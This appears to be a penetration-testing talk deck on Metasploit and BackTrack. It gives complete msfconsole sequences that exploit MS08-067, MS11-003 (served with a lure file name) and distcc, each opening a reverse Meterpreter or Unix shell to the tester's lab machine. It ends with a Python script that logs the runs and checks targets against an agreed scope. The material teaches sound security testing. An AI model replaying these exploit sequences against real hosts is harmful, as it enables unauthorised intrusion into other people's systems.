Agenda
Why & What's Penetration Testing (Pentest)
back|track Overview
Metasploit Basic & Meterpreter
DEMO :)
Why Do a Pentest
Millions of dollars are invested in security programs to protect critical infrastructures and prevent data breaches *1)
A Penetration Test is one of the most effective ways to identify systemic weaknesses and deficiencies in these programs *1)
A method to evaluate the security of a computer system / network
Practice (attacking) an IT system the way a hacker does
Find security holes (systemic weaknesses)
Bypass security mechanisms
Compromise an organization's IT system security
Ethics
Think before you act. Don't be stupid. Don't be malicious.
Pentest Phases
Information Gathering > Vulnerability Analysis > Exploitation > Post Exploitation > Reporting
What's Metasploit?
Not just a tool, but an entire framework *1)
An open source platform for writing security tools and exploits *2)
Easily build attack vectors by adding its exploits, payloads, encoders and other modules; create and execute more advanced attacks
Ruby based
Sunday, April 29, 12
Metasploit interfaces
MSFconsole
MSFcli
msfweb, msfgui (discontinued)
Metasploit Pro, Metasploit Express
Armitage
MSFconsole
MSFcli
Metasploit Terminology
Exploit: code that allows a pentester to take advantage of a flaw within a system, application, or service *1)
Payload: code that we want the target system to execute (a few commands to be executed on the target system) *1)
Shellcode: a set of instructions used as a payload when exploitation occurs *1)
Module: a piece of software that can be used by Metasploit *1)
Listener: a component that waits for an incoming connection *1)
(Diagram: attacker and vulnerable server)
Meterpreter
Exploiting a vulnerability to get a meterpreter shell: select meterpreter as the payload
Meterpreter commands
Pentest Scenario
OS in the Lab
BackTrack 5 R2
IP address : 172.16.240.143
Windows XP Exploitation
msf > search windows/smb
msf > info exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > exploit
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -l
Windows 7 Exploitation
msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > show options
msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi
msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
msf exploit(ms11_003_ie_css_import) > set LPORT 443
msf exploit(ms11_003_ie_css_import) > exploit
msf exploit(ms11_003_ie_css_import) > sessions -l
msf exploit(ms11_003_ie_css_import) > sessions -i 1
meterpreter > sysinfo
meterpreter > shell
search distcc
use exploit/unix/misc/distcc_exec
show payloads
set PAYLOAD cmd/unix/reverse
show options
set rhost 172.16.240.144
set lhost 172.16.240.143
exploit
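The three lab runs above end in sessions, but the Reporting phase still needs a record of which module was fired at which host, with which payload and listener, and whether every target was inside the agreed scope. As an added example (not part of the slides and not Metasploit's own code), the Python below parses an msfconsole transcript in the shape shown on this page into that record. The transcript, the scope set and the function names are constructed for this example; the only Metasploit facts it relies on are that option names are case-insensitive and that LPORT defaults to 4444 when not set.

```python
"""Turn an msfconsole transcript into an engagement record for the Reporting phase."""
import re
from dataclasses import dataclass, field

# Constructed sample transcript: the three lab runs from the slides, one command per line.
SAMPLE_TRANSCRIPT = """\
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
msf exploit(ms08_067_netapi) > exploit
msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
msf exploit(ms11_003_ie_css_import) > set LPORT 443
msf exploit(ms11_003_ie_css_import) > exploit
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse
msf exploit(distcc_exec) > set rhost 172.16.240.144
msf exploit(distcc_exec) > set lhost 172.16.240.143
msf exploit(distcc_exec) > exploit
"""

# Matches "msf > cmd" and "msf exploit(name) > cmd"; group 1 is the command typed.
PROMPT_RE = re.compile(r"^msf(?: exploit\([^)]*\))?\s*>\s*(.*)$")


@dataclass
class ExploitRun:
    module: str
    options: dict = field(default_factory=dict)
    launched: bool = False

    @property
    def target(self):
        # Client-side (browser) exploits have no fixed target host, so this is None for them.
        return self.options.get("RHOST")

    @property
    def listener(self):
        # Metasploit's reverse payloads default LPORT to 4444 when it is not set.
        return f"{self.options.get('LHOST', '?')}:{self.options.get('LPORT', '4444')}"


def parse_transcript(text):
    """Group 'use' / 'set' / 'exploit' commands into one ExploitRun per module selected."""
    runs, current = [], None
    for line in text.splitlines():
        m = PROMPT_RE.match(line.strip())
        if not m:
            continue                      # output lines and blank lines are ignored
        cmd = m.group(1).split()
        if not cmd:
            continue
        if cmd[0] == "use" and len(cmd) == 2:
            current = ExploitRun(module=cmd[1])
            runs.append(current)
        elif cmd[0] == "set" and len(cmd) >= 3 and current is not None:
            current.options[cmd[1].upper()] = " ".join(cmd[2:])  # option names are case-insensitive
        elif cmd[0] in ("exploit", "run") and current is not None:
            current.launched = True
    return runs


def report(runs, allowed_scope):
    """One line per launched run; any RHOST outside the agreed scope set is flagged."""
    lines = []
    for r in runs:
        if not r.launched:
            continue
        if r.target is None:
            target_txt, scope_txt = "client-side (victim browser)", "n/a"
        else:
            target_txt = r.target
            scope_txt = "OK" if r.target in allowed_scope else "OUT OF SCOPE"
        lines.append(f"{r.module} -> {target_txt} payload={r.options.get('PAYLOAD')} "
                     f"listener={r.listener} scope={scope_txt}")
    return lines


if __name__ == "__main__":
    # Constructed scope: the two lab victims from the slides.
    for line in report(parse_transcript(SAMPLE_TRANSCRIPT), {"172.16.240.129", "172.16.240.144"}):
        print(line)
```

The scope check is the part worth keeping: feeding the real console log through it at the end of an engagement gives a quick, mechanical answer to "did we touch anything we were not authorised to touch" before the report goes out.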
Any questions?
Contact me
References
1. Metasploit: The Penetration Tester's Guide, by David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni
2. http://www.metasploit.com
3. http://www.offensive-security.com/metasploitunleashed/Main_Page
4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines